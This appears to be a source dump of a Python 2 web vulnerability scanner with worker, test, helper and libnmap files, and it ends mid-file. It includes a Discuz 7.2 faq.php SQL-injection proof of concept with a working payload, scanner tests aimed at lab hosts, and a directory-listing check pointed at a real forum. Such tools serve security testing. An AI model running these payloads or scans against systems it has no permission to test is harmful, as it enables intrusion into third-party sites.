LFI_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=3" 86 | CMD_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=5" 87 | BAK_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=6" 88 | -------------------------------------------------------------------------------- /teye_worker/RDB.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | RDB.py 4 | ''' 5 | import sys 6 | sys.path.append("..") 7 | import teye_config as Settings 8 | 9 | import rpyc 10 | import logging 11 | import json 12 | 13 | import time 14 | import hashlib 15 | import sys 16 | import threading 17 | 18 | class RDB: 19 | 20 | def __init__(self): 21 | 22 | self.__client = None 23 | 24 | 25 | def connect(self): 26 | 27 | try: 28 | self.__client = rpyc.connect(Settings.RPYC_HOST,Settings.RPYC_PORT) 29 | 30 | self.__client.root.open() 31 | 32 | except Exception,e: 33 | 34 | self.close() 35 | 36 | def getTaskcount(self): 37 | 38 | result = self.__client.root.client_getTaskcount() 39 | 40 | count = int(result[0][0]) 41 | 42 | return count 43 | 44 | def getNewtasks(self,num): 45 | 46 | data=[] 47 | 48 | if self.__client is None: 49 | self.connect() 50 | 51 | result = self.__client.root.client_getNewtasks(num) 52 | 53 | for task in result: 54 | 55 | Settings.WAT_MSG_INFO['taskid']=task[0] 56 | Settings.WAT_MSG_INFO['website']=task[1] 57 | Settings.WAT_MSG_INFO['profile']=task[2] 58 | msg = json.dumps(Settings.WAT_MSG_INFO) 59 | 60 | content={"taskid":task[0],"msg":msg} 61 | 62 | data.append(content) 63 | 64 | return data 65 | 66 | def updateStart(self,taskid,starttime): 67 | ''' 68 | ''' 69 | self.__client.root.client_update_starttime(taskid,starttime) 70 | 71 | return True 72 | 73 | def updateFinish(self,taskid,finishtime): 74 | ''' 75 | ''' 76 | self.__client.root.client_update_finishtime(taskid,finishtime) 77 | 78 | return True 79 | 80 | def updateProgress(self,taskid,progress): 81 | ''' 82 | ''' 83 | self.__client.root.client_update_progress(taskid,progress) 84 | 85 | return True 86 | 87 | def updateStatus(self,taskid,status,msginfo=''): 88 | ''' 89 | 0----init 90 | 1----queue 91 | 2----scan 92 | 3----stop 93 | 4----erro 94 | 5----finish 95 | ''' 96 | 97 | self.__client.root.client_updateStatus(taskid,status,msginfo) 98 | 99 | return True 100 | 101 | def updateFlag(self,taskid): 102 | ''' 103 | ''' 104 | 105 | self.__client.root.client_update_flag(taskid) 106 | 107 | return True 108 | 109 | def close(self): 110 | if self.__client is not None: 111 | 112 | try: 113 | self.__client.root.close() 114 | except: 115 | pass 116 | 117 | self.__client.close() 118 | else: 119 | self.__client=None 120 | 121 | if __name__=="__main__": 122 | rdb =RDB() 123 | rdb.connect() 124 | result =rdb.getNewtasks(3) 125 | print result 126 | -------------------------------------------------------------------------------- /teye_data/info.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | info.py 4 | ++++++++++++++++++++++++ 5 | { 6 | "scan_node":"", 7 | "entry":"www.baidu.com", 8 | "scan_target":[], 9 | "domain":"", 10 | "ipaddr":"", 11 | "port":"", 12 | "finger":[], 13 | "nameserver":[], 14 | "subdomain":[], 15 | "relate_ipaddr":[], 16 | "dir":[], 17 | "vuln":[] 18 | } 19 | +++++++++++++++++++++++ 20 | ''' 21 | 22 | import json 23 | 24 | class info(dict): 25 | ''' 26 | ''' 27 | def __init__(self): 28 | ''' 29 | ''' 30 | self["scan_node"] = "" 31 | self["entry"] = "" 32 | self["start_time"] = "" 33 | self["end_time"] = "" 34 | self["scan_profile"] = None 35 | self["scan_target"] = [] 36 | self["domain"] = "" 37 | self["ipaddr"] = "" 38 | self["port"] = "" 39 | self["finger"] = [] 40 | self["nameserver"] = [] 41 | self["subdomain"] = [] 42 | self["relate_ipaddr"]= [] 43 | self["dir"] = [] 44 | self["vuln"] = [] 45 | 46 | #external 47 | self["api"] = [] 48 | 49 | def set_profile(self,profile): 50 | ''' 51 | ''' 52 | self["scan_profile"]=profile 53 | 54 | def set_myip(self,myip): 55 | ''' 56 | ''' 57 | self["scan_node"]=myip 58 | 59 | def set_entry(self,site): 60 | ''' 61 | ''' 62 | self["entry"] = site 63 | 64 | def set_start_time(self,starttime): 65 | ''' 66 | ''' 67 | self["start_time"] = starttime 68 | 69 | def set_end_time(self,endtime): 70 | ''' 71 | ''' 72 | self["end_time"] = endtime 73 | 74 | def set_domain(self,domain): 75 | ''' 76 | ''' 77 | self["domain"] = domain 78 | 79 | def set_ipaddr(self,ipaddr): 80 | ''' 81 | ''' 82 | self["ipaddr"] = ipaddr 83 | 84 | def set_port(self,port): 85 | ''' 86 | ''' 87 | self["port"] = port 88 | 89 | def set_finger(self,finger): 90 | ''' 91 | ''' 92 | self["finger"] = finger 93 | 94 | def set_subdomain(self,subdomain): 95 | ''' 96 | ''' 97 | self["subdomain"] = subdomain 98 | 99 | def set_relate_ipaddr(self,ip_list): 100 | ''' 101 | ''' 102 | self["relate_ipaddr"] = ip_list 103 | 104 | def set_vuln(self,vuln): 105 | ''' 106 | ''' 107 | self["vuln"] = vuln 108 | 109 | def set_api(self,api): 110 | ''' 111 | ''' 112 | self["api"] = api 113 | 114 | def set_data(self,key,value): 115 | ''' 116 | ''' 117 | self[key] = value 118 | 119 | def get_data(self,key): 120 | ''' 121 | ''' 122 | return self[key] 123 | 124 | def __str__(self): 125 | ''' 126 | ''' 127 | msg = json.dumps(self) 128 | 129 | return msg 130 | 131 | def __repr__(self): 132 | ''' 133 | ''' 134 | return "" % (self._entry,self._ipaddr) 135 | 136 | 137 | db_info = info() 138 | -------------------------------------------------------------------------------- /misc/common.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | common.py 4 | ''' 5 | 6 | import json 7 | import string 8 | import hashlib 9 | import urllib2 10 | 11 | from random import choice, randint 12 | 13 | 14 | def rand_letters(length=0): 15 | ''' 16 | ''' 17 | t_list = [] 18 | for i in xrange(length or randint(6, 10)): 19 | t_list.append(choice(string.letters)) 20 | return ''.join(t_list) 21 | 22 | 23 | def rand_numbers(length=0): 24 | ''' 25 | ''' 26 | t_list = [] 27 | for i in xrange(length or randint(6, 10)): 28 | if i == 0: 29 | t_list.append(choice(string.digits[1:])) 30 | else: 31 | t_list.append(choice(string.digits)) 32 | return ''.join(t_list) 33 | 34 | 35 | def md5(str): 36 | ''' 37 | ''' 38 | m = hashlib.md5() 39 | m.update(str) 40 | return m.hexdigest() 41 | 42 | 43 | def get_my_ip(): 44 | ''' 45 | ''' 46 | api = "http://ip.taobao.com/service/getIpInfo.php" 47 | ipaddr = "" 48 | try: 49 | req = urllib2.Request(api, data="ip=myip") 50 | res = urllib2.urlopen(req) 51 | data = json.loads(res.read()) 52 | ipaddr = data["data"]["ip"] 53 | except: 54 | pass 55 | 56 | return ipaddr 57 | 58 | 59 | def is_404(res_body): 60 | ''' 61 | ''' 62 | T_404_key = [u"抱歉,您访问的页面", u"404-页面不存在", u"很抱歉,您要访问的页面不存在!", u"error404"] 63 | 64 | if isinstance(res_body, unicode): 65 | str_res_body = res_body.encode("utf-8") 66 | else: 67 | str_res_body = res_body 68 | 69 | for pattern in T_404_key: 70 | try: 71 | if str_res_body.find(pattern) > -1: 72 | return True 73 | except: 74 | return False 75 | 76 | return False 77 | 78 | 79 | def is_ip_address(address): 80 | ''' 81 | ''' 82 | parts = address.split(".") 83 | if len(parts) != 4: 84 | return False 85 | 86 | for item in parts: 87 | try: 88 | if not 0 <= int(item) <= 255: 89 | return False 90 | except: 91 | return False 92 | 93 | return True 94 | 95 | 96 | def is_equal_list(s_list, o_list): 97 | ''' 98 | ''' 99 | if not isinstance(s_list, list) or not isinstance(o_list, list): 100 | return False 101 | 102 | s_len = len(s_list) 103 | o_len = len(o_list) 104 | 105 | if s_len != o_len: 106 | return False 107 | 108 | count = 0 109 | for item in s_list: 110 | if item in o_list: 111 | count += 1 112 | 113 | if count == s_len: 114 | return True 115 | 116 | 117 | if __name__ == "__main__": 118 | ip = get_my_ip() 119 | print ip 120 | -------------------------------------------------------------------------------- /scan_log.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | scan_log.py 4 | ''' 5 | ''' 6 | 192.168.126.1 - - [17/Dec/2016:17:52:45 +0800] "GET /p.php?act=rt&callback=jQuery170013389064965628972_1481968361729&_=1481968365810 HTTP/1.1" 192.168.126.145 200 416 "http://192.168.126.145/p.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" "2zA_sid=1QFL02; mycookie=you are spider" "-" "-" 7 | ''' 8 | 9 | import re 10 | from teye_web.http.URL import URL 11 | from teye_web.http.Request import Request 12 | from teye_web.http.cookie import cookie 13 | from teye_web.http.postdata import postdata 14 | 15 | from teye_data.vulnmanager import vm 16 | 17 | log_pattern=re.compile(r''' 18 | ([^\s]+)\s #remote_ip 19 | -\s-\s(\[[^\]]+\])\s #[time] 20 | ("[^"]+")\s #request 21 | ([^\s]+)\s #host 22 | (\d{3})\s #Code 23 | (\d+)\s #body_bytes_send 24 | "([^"]+)"\s #http_referer 25 | "([^"]+)"\s #http_user_anget 26 | "([^"]+)"\s #http_cookie 27 | "([^"]+)"\s #http_x_forward_for 28 | "([^"]+)" #request_body 29 | ''',re.X) 30 | 31 | log='192.168.126.1 - - [17/Dec/2016:17:52:45 +0800] "GET /p.php?act=rt&callback=jQuery170013389064965628972_1481968361729&_=1481968365810 HTTP/1.1" 192.168.126.145 200 416 "http://192.168.126.145/p.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" "2zA_sid=1QFL02; mycookie=you are spider" "-" "-"' 32 | 33 | 34 | 35 | match = log_pattern.match(log) 36 | if match: 37 | info_tuple = match.groups() 38 | #print info_tuple 39 | log_ip = info_tuple[0] 40 | log_time = info_tuple[1] 41 | log_request = info_tuple[2] 42 | log_host = info_tuple[3] 43 | log_referer = info_tuple[6] 44 | log_cookie = info_tuple[8] 45 | log_x_forward_for = info_tuple[9] 46 | log_body = info_tuple[10] 47 | 48 | 49 | temp_request = log_request.split(" ") 50 | 51 | method = temp_request[0][1:].upper() 52 | uri = temp_request[1][0:-8] 53 | url = log_host + uri 54 | 55 | headers={"Referer":"","Cookie":"","X-Forward-For":""} 56 | 57 | headers["Referer"]=log_referer 58 | headers["Cookie"]=log_cookie 59 | if log_x_forward_for=='-': 60 | del headers["X-Forward-For"] 61 | else: 62 | headers["X-Forward-For"]=log_x_forward_for 63 | 64 | post_data = postdata(log_body) 65 | urlobj = URL(url) 66 | if method == "GET": 67 | req = Request(urlobj,method,headers=headers) 68 | elif method == "POST": 69 | req = Request(urlobj,method,headers=headers,post_data=post_data) 70 | print req 71 | from teye_core.tcore import tCore 72 | scan_engine = tCore() 73 | scan_engine.scan_request(req) 74 | 75 | print vm.get_all_vuln() 76 | -------------------------------------------------------------------------------- /tests/test_common_vuln.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | from teye_web.http.Request import Request 4 | from teye_web.sql import sql 5 | from teye_web.xss import xss 6 | from teye_web.cmd import cmd 7 | from teye_web.lfi import lfi 8 | from teye_web.bak import bak 9 | from teye_web.ver import ver 10 | from teye_data.vuln import vuln 11 | from teye_data.vulnmanager import vm 12 | 13 | 14 | def test_sql(): 15 | ''' 16 | ''' 17 | url_list = [("number","http://192.168.126.143/book/sql/1_sql.php?id=1"), 18 | ("char_single","http://192.168.126.143/book/sql/2_sql.php?id=1"), 19 | ("char_dobule","http://192.168.126.143/book/sql/3_sql.php?id=1"), 20 | ("search_single","http://192.168.126.143/book/sql/4_sql.php?search=a"), 21 | ("search_dobule","http://192.168.126.143/book/sql/5_sql.php?search=a"), 22 | ] 23 | 24 | for type,url in url_list: 25 | req = Request(url) 26 | t_scanner=sql() 27 | t_scanner.check(req) 28 | print vm.get_all_vuln() 29 | 30 | def test_xss(): 31 | ''' 32 | ''' 33 | url_list=['http://192.168.126.143/book/xss/1_xss.php?data=test', 34 | 'http://192.168.126.143/book/xss/2_xss.php?data=test', 35 | 'http://192.168.126.143/book/xss/3_xss.php?data=test' 36 | ] 37 | 38 | for url in url_list: 39 | req = Request(url) 40 | t_scanner = xss() 41 | t_scanner.check(req) 42 | 43 | print vm.get_all_vuln() 44 | 45 | def test_lfi(): 46 | ''' 47 | ''' 48 | url_list=['http://192.168.126.145/book/lfi/1_lfi.php?data=test', 49 | 'http://192.168.126.145/book/lfi/2_lfi.php?data=test', 50 | 'http://192.168.126.145/book/lfi/3_lfi.php?data=test' 51 | ] 52 | 53 | for url in url_list: 54 | req = Request(url) 55 | t_scanner = lfi() 56 | t_scanner.check(req) 57 | 58 | print vm.get_all_vuln() 59 | 60 | def test_cmd(): 61 | ''' 62 | ''' 63 | url_list=['http://192.168.126.145/book/cmd/1_cmd.php?data=test', 64 | 'http://192.168.126.145/book/cmd/2_cmd.php?data=test', 65 | 'http://192.168.126.145/book/cmd/3_cmd.php?data=test', 66 | 'http://192.168.126.145/book/cmd/4_cmd.php?data=test', 67 | 'http://192.168.126.145/book/cmd/5_cmd.php?data=test' 68 | ] 69 | 70 | for url in url_list: 71 | req = Request(url) 72 | t_scanner = cmd() 73 | t_scanner.check(req) 74 | 75 | print vm.get_all_vuln() 76 | 77 | def test_bak(): 78 | ''' 79 | ''' 80 | bak_url="http://192.168.126.143/book/bak/2.php" 81 | req = Request(bak_url) 82 | t_scanner=bak() 83 | t_scanner.check(req) 84 | 85 | print vm.get_all_vuln() 86 | 87 | def test_ver(): 88 | ''' 89 | ''' 90 | ver_url="http://192.168.126.143/book/ver/" 91 | req = Request(ver_url) 92 | t_scanner=ver() 93 | t_scanner.check(req) 94 | print vm.get_all_vuln() 95 | -------------------------------------------------------------------------------- /teye_util/progress.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | progress.py 4 | ''' 5 | 6 | import time 7 | from LogManager import log 8 | 9 | class progress: 10 | ''' 11 | ''' 12 | def __init__(self): 13 | 14 | self._max_value=0 15 | self._current_value=0 16 | self._first_amount_change_time=None 17 | self._eta=None 18 | 19 | def set_total_amount(self,value): 20 | 21 | self._max_value=value 22 | self._current_value=0.1 23 | self._first_amount_change_time=None 24 | 25 | 26 | def inc(self): 27 | ''' 28 | add 1 small unit to the current value 29 | ''' 30 | if self._current_value == self._max_value: 31 | log.error('Current value can never be greater than max value!') 32 | else: 33 | self._current_value +=0.1 34 | self._update_eta() 35 | 36 | def incplugin(self): 37 | ''' 38 | add 1 big unit to the current value 39 | ''' 40 | 41 | if self._current_value == self._max_value: 42 | log.error('Current value can never be greater than max value!') 43 | else: 44 | self._current_value +=1 45 | self._update_eta() 46 | 47 | def _update_eta(self): 48 | 49 | if not self._first_amount_change_time: 50 | self._first_amount_change_time=time.time() 51 | else: 52 | time_already_elapsed=time.time()-self._first_amount_change_time 53 | 54 | try: 55 | time_for_all_requests = (self._max_value * time_already_elapsed)/self._current_value 56 | except ZeroDivisionError: 57 | time_for_all_requests = time_already_elapsed * 2 58 | else: 59 | self._eta = time_for_all_requests - time_already_elapsed 60 | 61 | 62 | def get_progress(self): 63 | 64 | if self._max_value ==0: 65 | return 0 66 | 67 | return int((self._current_value / self._max_value)*100) 68 | 69 | def finish(self): 70 | 71 | self._max_value=1 72 | self._current_value =1 73 | self._first_amount_change_time = None 74 | self._eta = None 75 | 76 | def get_eta(self): 77 | 78 | if not self._eta: 79 | return 0,0,0,0 80 | else: 81 | 82 | self._update_eta() 83 | 84 | temp = fload() 85 | temp = fload(self._eta) / (60*60*24) 86 | d =int(temp) 87 | temp = (temp-d)*24 88 | h = int(temp) 89 | temp = (temp-h)*60 90 | m=int(temp) 91 | temp=(temp-m)*60 92 | sec = temp 93 | 94 | return d,h,m,sec 95 | 96 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_cpe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from libnmap.objects.os import CPE 5 | import unittest 6 | 7 | 8 | class TestNmapFP(unittest.TestCase): 9 | def setUp(self): 10 | self.cpelist = ['cpe:/a:apache:http_server:2.2.22', 11 | 'cpe:/a:heimdal:kerberos', 12 | 'cpe:/a:openbsd:openssh:5.9p1', 13 | 'cpe:/o:apple:iphone_os:5', 14 | 'cpe:/o:apple:mac_os_x:10.8', 15 | 'cpe:/o:apple:mac_os_x', 16 | 'cpe:/o:linux:linux_kernel:2.6.13', 17 | 'cpe:/o:linux:linux_kernel', 18 | 'cpe:/o:microsoft:windows_7', 19 | 'cpe:/o:microsoft:windows_7::-:professional', 20 | 'cpe:/o:microsoft:windows_7::sp1', 21 | 'cpe:/o:microsoft:windows', 22 | 'cpe:/o:microsoft:windows_server_2008::beta3', 23 | 'cpe:/o:microsoft:windows_server_2008', 24 | 'cpe:/o:microsoft:windows_server_2008::sp1', 25 | 'cpe:/o:microsoft:windows_vista::-', 26 | 'cpe:/o:microsoft:windows_vista::sp1', 27 | 'cpe:/o:microsoft:windows_vista::sp2'] 28 | 29 | def test_cpe(self): 30 | apa = CPE(self.cpelist[0]) 31 | 32 | self.assertTrue(apa.is_application()) 33 | self.assertFalse(apa.is_hardware()) 34 | self.assertFalse(apa.is_operating_system()) 35 | 36 | 37 | win = CPE(self.cpelist[12]) 38 | self.assertEqual(win.get_vendor(), 'microsoft') 39 | self.assertEqual(win.get_product(), 'windows_server_2008') 40 | self.assertEqual(win.get_version(), '') 41 | self.assertEqual(win.get_update(), 'beta3') 42 | self.assertEqual(win.get_edition(), '') 43 | self.assertEqual(win.get_language(), '') 44 | 45 | def test_full_cpe(self): 46 | cpestr = 'cpe:/a:mozilla:firefox:2.0::osx:es-es' 47 | resdict = { 'part':'/a', 'vendor':"mozilla", 'product':"firefox", 'version':"2.0", 'update':'', 'edition':"osx", 'language':'es-es' } 48 | ocpe = CPE(cpestr) 49 | objdict = {'part': ocpe.get_part(), 50 | 'vendor': ocpe.get_vendor(), 51 | 'product': ocpe.get_product(), 52 | 'version': ocpe.get_version(), 53 | 'update': ocpe.get_update(), 54 | 'language': ocpe.get_language(), 55 | 'edition': ocpe.get_edition() 56 | } 57 | self.assertEqual(objdict, resdict) 58 | 59 | if __name__ == '__main__': 60 | test_suite = ['test_cpe', 'test_full_cpe'] 61 | suite = unittest.TestSuite(map(TestNmapFP, test_suite)) 62 | test_result = unittest.TextTestRunner(verbosity=2).run(suite) 63 | -------------------------------------------------------------------------------- /teye_poc/discuz_faq_sql.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import sys 5 | 6 | sys.path.append("/Users/imiyoo/workplace/tscanner/") 7 | 8 | import re 9 | from teye_web.http.URL import URL 10 | from teye_web.util.error_sql import get_error_sql_key 11 | 12 | # urllib2,requests,httplib2 13 | from wCurl import wcurl 14 | 15 | from teye_poc.PocScan import PocScan 16 | from LogManager import log 17 | 18 | import httplib 19 | 20 | httplib.HTTPConnection.debuglevel = 1 21 | 22 | from teye_data.vulnmanager import vm 23 | 24 | 25 | class discuz_faq_sql(PocScan): 26 | ''' 27 | ''' 28 | 29 | def __init__(self): 30 | ''' 31 | ''' 32 | self._poc_info = { 33 | 34 | 'w_hat': { 35 | 'author': "imiyoo", 36 | 'blog': "http://www.imiyoo.com", 37 | 'team': "W.A.T", 38 | 'create_time': "2014-11-21" 39 | }, 40 | 'w_vul': { 41 | 'id': u"WID-2014-0002", 42 | 'title': u"Discuz7.2 faq.php SQL注入漏洞", 43 | 'method': u"GET", 44 | 'tag': u"discuz", 45 | 'rank': u"高危", 46 | 'info': u"http://www.watscan.com/" 47 | } 48 | } 49 | 50 | self._vuln_file = "faq.php" 51 | 52 | self._vuln_param = "action=grouppermission&gids[10]=\\&gids[11][0]=)||{SQL}%23" 53 | 54 | # 扫描模式:0为域名模式检测,1为路径模式检测(检测用户输入的URL路径) 55 | self._scan_mode = 0 56 | 57 | def check(self, url): 58 | ''' 59 | ''' 60 | log.info(u"正在检测目标是否存在:[%s]..." % self.get_title()) 61 | domain_path = url.get_domain_path() 62 | exp_url = domain_path.urljoin(self._vuln_file) 63 | error_sql, error_key = get_error_sql_key(type="floor") 64 | exp_params = self._vuln_param.replace("{SQL}", error_sql) 65 | res = wcurl.get(exp_url, params=exp_params) 66 | if self._find_vuln(res, error_key): 67 | self.security_hole(exp_url) 68 | 69 | def _find_vuln(self, res, key): 70 | ''' 71 | ''' 72 | body = res.body 73 | if body is None: 74 | return False 75 | 76 | if body.find(key) > 0: 77 | return True 78 | else: 79 | return False 80 | 81 | def get_name(self): 82 | ''' 83 | ''' 84 | return self.__class__.__name__ 85 | 86 | 87 | if __name__ == "__main__": 88 | from optparse import OptionParser 89 | 90 | usage = "usage: %prog [options] arg" 91 | parser = OptionParser(usage) 92 | parser.add_option("-u", "--url", action="store", dest="url", default=None, help="Scan the target url") 93 | (options, args) = parser.parse_args() 94 | if not options.url: 95 | parser.print_help() 96 | sys.exit(-1) 97 | else: 98 | url = options.url 99 | target_url = URL(url) 100 | check_inst = discuz_faq_sql() 101 | check_inst.check(target_url) 102 | print vm.get_all_vuln() 103 | -------------------------------------------------------------------------------- /teye_web/directory.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | nginx.py 4 | ''' 5 | import sys 6 | 7 | sys.path.append("/Users/imiyoo/workplace/teye_scan/") 8 | 9 | from misc.common import is_404 10 | import copy 11 | import teye_data.severity as severity 12 | from teye_data.vuln import vuln 13 | from teye_data.vulnmanager import vm 14 | 15 | from LogManager import log 16 | 17 | # wCurl 18 | from wCurl import wcurl 19 | from http.Request import Request 20 | 21 | 22 | class directory: 23 | ''' 24 | ''' 25 | 26 | def __init__(self): 27 | ''' 28 | ''' 29 | self._DIR_INDEXING = ( 30 | "Index of /", 31 | '<a href="?C=N;O=D">Name</a>', 32 | '<A HREF="?M=A">Last modified</A>', 33 | "Last modified</a>", 34 | "Parent Directory</a>", 35 | "Directory Listing for", 36 | "<TITLE>Folder Listing.", 37 | '<table summary="Directory Listing" ', 38 | "- Browsing directory ", 39 | # IIS 6.0 and 7.0 40 | '">[To Parent Directory]</a><br><br>', 41 | # IIS 5.0 42 | '<A HREF=".*?">.*?</A><br></pre><hr></body></html>' 43 | ) 44 | 45 | self._already_dir_urls = [] 46 | 47 | def check(self, t_request): 48 | ''' 49 | ''' 50 | log.info(u"正在检测目标是否存在Directory目录列举漏洞...") 51 | 52 | http_request = copy.deepcopy(t_request) 53 | url_obj = http_request.get_url() 54 | dir_list = url_obj.get_dirs() 55 | 56 | for item in dir_list: 57 | if item in self._already_dir_urls: 58 | return 59 | 60 | self._already_dir_urls.append(item) 61 | 62 | req_url = item.get_uri_string() 63 | 64 | res = wcurl.get(req_url) 65 | 66 | if self._find_vuln(res): 67 | v = vuln() 68 | v.set_url(req_url) 69 | v.set_method("GET") 70 | v.set_param("") 71 | v.set_name("Directory List Vuln") 72 | v.set_rank(severity.M) 73 | vm.append(self, http_request.get_url().get_host(), "directory", v) 74 | 75 | log.info("Directory List Vuln") 76 | print "----------Directory List Vuln" 77 | break 78 | 79 | def _find_vuln(self, res): 80 | ''' 81 | ''' 82 | if res is None: 83 | return False 84 | 85 | res_body = res.body 86 | 87 | if res_body is None: 88 | return False 89 | 90 | if res.get_code() == 200 and not is_404(res_body): 91 | for item in self._DIR_INDEXING: 92 | if res_body.find(item) > -1: 93 | return True 94 | else: 95 | return False 96 | 97 | def get_name(self): 98 | ''' 99 | ''' 100 | return "teye_directory_plugin" 101 | 102 | 103 | if __name__ == "__main__": 104 | ''' 105 | ''' 106 | req_url = "http://bbs.wdai.com/data/attachment/forum/201507/08/" 107 | req = Request(req_url) 108 | vuln_inst = directory() 109 | vuln_inst.check(req) 110 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_report_diff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import os 6 | from libnmap.parser import NmapParser 7 | 8 | 9 | class TestNmapReportDiff(unittest.TestCase): 10 | def setUp(self): 11 | fdir = os.path.dirname(os.path.realpath(__file__)) 12 | self.flist_full = [{'file': "%s/%s" % (fdir, 'files/2_hosts.xml'), 13 | 'hosts': 2}, 14 | {'file': "%s/%s" % (fdir, 'files/1_hosts.xml'), 15 | 'hosts': 1}] 16 | self.flist = self.flist_full 17 | 18 | def test_diff_host_list(self): 19 | fdir = os.path.dirname(os.path.realpath(__file__)) 20 | r1 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml')) 21 | r2 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/2_hosts.xml')) 22 | r3 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml')) 23 | r4 = NmapParser.parse_fromfile("%s/%s" % (fdir, 24 | 'files/2_hosts_achange.xml')) 25 | 26 | d1 = r1.diff(r2) 27 | self.assertEqual(d1.changed(), set(['hosts_total', 'commandline', 28 | 'hosts_up', 'scan_type', 29 | 'elapsed'])) 30 | self.assertEqual(d1.unchanged(), set(['hosts_down', 'version', 31 | 'NmapHost::127.0.0.1'])) 32 | self.assertEqual(d1.removed(), set(['NmapHost::74.207.244.221'])) 33 | 34 | d2 = r1.diff(r3) 35 | self.assertEqual(d2.changed(), set([])) 36 | self.assertEqual(d2.unchanged(), set(['hosts_total', 37 | 'commandline', 38 | 'hosts_up', 39 | 'NmapHost::127.0.0.1', 40 | 'elapsed', 41 | 'version', 42 | 'scan_type', 43 | 'hosts_down'])) 44 | self.assertEqual(d2.added(), set([])) 45 | self.assertEqual(d2.removed(), set([])) 46 | 47 | d3 = r2.diff(r4) 48 | self.assertEqual(d3.changed(), set(['NmapHost::127.0.0.1'])) 49 | self.assertEqual(d3.unchanged(), set(['hosts_total', 50 | 'commandline', 51 | 'hosts_up', 52 | 'NmapHost::74.207.244.221', 53 | 'version', 54 | 'elapsed', 55 | 'scan_type', 56 | 'hosts_down'])) 57 | self.assertEqual(d3.added(), set([])) 58 | self.assertEqual(d3.removed(), set([])) 59 | 60 | 61 | if __name__ == '__main__': 62 | test_suite = ['test_diff_host_list'] 63 | suite = unittest.TestSuite(map(TestNmapReportDiff, test_suite)) 64 | test_result = unittest.TextTestRunner(verbosity=2).run(suite) 65 | -------------------------------------------------------------------------------- /thirdparty/libnmap/diff.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | 4 | class DictDiffer(object): 5 | """ 6 | Calculate the difference between two dictionaries as: 7 | (1) items added 8 | (2) items removed 9 | (3) keys same in both but changed values 10 | (4) keys same in both and unchanged values 11 | """ 12 | def __init__(self, current_dict, past_dict): 13 | self.current_dict = current_dict 14 | self.past_dict = past_dict 15 | self.set_current = set(current_dict.keys()) 16 | self.set_past = set(past_dict.keys()) 17 | self.intersect = self.set_current.intersection(self.set_past) 18 | 19 | def added(self): 20 | return self.set_current - self.intersect 21 | 22 | def removed(self): 23 | return self.set_past - self.intersect 24 | 25 | def changed(self): 26 | return (set(o for o in self.intersect 27 | if self.past_dict[o] != self.current_dict[o])) 28 | 29 | def unchanged(self): 30 | return (set(o for o in self.intersect 31 | if self.past_dict[o] == self.current_dict[o])) 32 | 33 | 34 | class NmapDiff(DictDiffer): 35 | """ 36 | NmapDiff compares two objects of same type to enable the user to check: 37 | 38 | - what has changed 39 | - what has been added 40 | - what has been removed 41 | - what was kept unchanged 42 | 43 | NmapDiff inherit from DictDiffer which makes the actual comparaison. 44 | The different methods from DictDiffer used by NmapDiff are the 45 | following: 46 | 47 | - NmapDiff.changed() 48 | - NmapDiff.added() 49 | - NmapDiff.removed() 50 | - NmapDiff.unchanged() 51 | 52 | Each of the returns a python set() of key which have changed in the 53 | compared objects. To check the different keys that could be returned, 54 | refer to the get_dict() method of the objects you which to 55 | compare (i.e: libnmap.objects.NmapHost, NmapService,...). 56 | """ 57 | def __init__(self, nmap_obj1, nmap_obj2): 58 | """ 59 | Constructor of NmapDiff: 60 | 61 | - Checks if the two objects are of the same class 62 | - Checks if the objects are "comparable" via a call to id() (dirty) 63 | - Inherits from DictDiffer and 64 | """ 65 | if(nmap_obj1.__class__ != nmap_obj2.__class__ or 66 | nmap_obj1.id != nmap_obj2.id): 67 | raise NmapDiffException("Comparing objects with non-matching id") 68 | 69 | self.object1 = nmap_obj1.get_dict() 70 | self.object2 = nmap_obj2.get_dict() 71 | 72 | DictDiffer.__init__(self, self.object1, self.object2) 73 | 74 | def __repr__(self): 75 | return ("added: [{0}] -- changed: [{1}] -- " 76 | "unchanged: [{2}] -- removed [{3}]".format(self.added(), 77 | self.changed(), 78 | self.unchanged(), 79 | self.removed())) 80 | 81 | 82 | class NmapDiffException(Exception): 83 | def __init__(self, msg): 84 | self.msg = msg 85 | -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/mongodb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import json 3 | from pymongo import MongoClient 4 | from bson.objectid import ObjectId 5 | 6 | from libnmap.reportjson import ReportEncoder 7 | from libnmap.parser import NmapParser 8 | from libnmap.plugins.backendplugin import NmapBackendPlugin 9 | 10 | 11 | class NmapMongodbPlugin(NmapBackendPlugin): 12 | """ 13 | This class handle the persistence of NmapRepport object in mongodb 14 | Implementation is made using pymongo 15 | Object of this class must be create via the 16 | BackendPluginFactory.create(**url) where url is a named dict like 17 | {'plugin_name': "mongodb"} this dict may reeive all the param 18 | MongoClient() support 19 | """ 20 | def __init__(self, dbname=None, store=None, **kwargs): 21 | 